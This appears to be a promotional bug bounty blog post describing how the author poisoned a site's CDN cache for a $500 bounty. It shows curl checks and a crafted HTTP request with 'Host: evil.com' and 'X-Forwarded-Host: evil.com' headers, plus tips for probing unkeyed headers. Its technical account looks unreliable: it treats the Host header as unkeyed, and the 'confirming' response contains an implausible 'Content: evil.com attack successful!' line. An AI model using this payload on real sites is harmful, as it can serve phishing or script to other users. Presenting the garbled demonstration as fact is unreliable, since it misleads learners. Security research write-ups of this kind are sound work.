💰 I Found Cache Poisoning & Earned $500 in Just a Few Minutes! 🚀
🚀 How I Discovered a Cache Poisoning Bug in Minutes & Got Paid!
One of the easiest yet highly overlooked vulnerabilities in bug bounty hunting is cache poisoning. Recently, I found a simple misconfiguration that allowed me to poison a website’s cache and deliver attacker-controlled content to all users! 💥 This led to a quick $500 bounty, and in this guide, I’ll show you how I did it step by step.
🕵️♂️ Step 1: Finding a Target with Caching Mechanisms
While testing a large website, I noticed it was using CDN-based caching (like Cloudflare, Akamai, or Fastly). These caching mechanisms store responses to serve them faster. However, if the cache incorrectly processes headers, attackers can manipulate responses to affect all users. 🚨
To check for caching behavior, I sent a simple curl request:
curl -I https://target.com/pageResponse:
HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
X-Cache: HIT🚀 Key Findings:
Cache-Control: public → The response can be cached.
X-Cache: HIT → The page is cached and being served from cache.
🔥 Step 2: Poisoning the Cache Using Unkeyed Headers
Many caching servers don’t correctly validate unkeyed headers (headers that don’t change the cache key). One common vulnerability is Host header poisoning.
I sent a request with a malicious Host header:
GET /page HTTP/1.1
Host: evil.com
X-Forwarded-Host: evil.comIf the server processes this header incorrectly, it caches the modified response for all users! 😈
⚠️ Step 3: Confirming the Cache Poisoning
To check if my payload worked, I made a request as a normal user:
curl -I https://target.com/pageAnd the response came back with my injected Host header!
HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content: evil.com attack successful!
X-Cache: HIT🚨 Impact: ✅ Attackers can serve malicious content (phishing pages, fake login forms, etc.).
✅ Stored XSS can be injected, affecting thousands of users.
✅ Critical resources like login or checkout pages can be poisoned.
📩 Reporting & Quick $500 Bounty
Once I confirmed the bug, I immediately reported it via the bug bounty platform. Since it could be used for phishing or spreading malware, the security team acknowledged the risk and paid a quick $500 bounty! 💰🔥
🏆 Lessons Learned
1️⃣ Always check for cacheable responses (Cache-Control: public).
2️⃣ Test different unkeyed headers (e.g., X-Forwarded-Host, X-Original-URL).
3️⃣ Look for CDN misconfigurations (Fastly, Cloudflare, Akamai).
4️⃣ Report responsibly—cache poisoning can be dangerous!
🔥 Want More Hacking Tutorials?
🛡️ Subscribe for Cybersecurity Videos: youtube.com/@theindiannetwork
💌 Need Ethical Hacking Consultation? Contact: theindiannetwork@protonmail.com
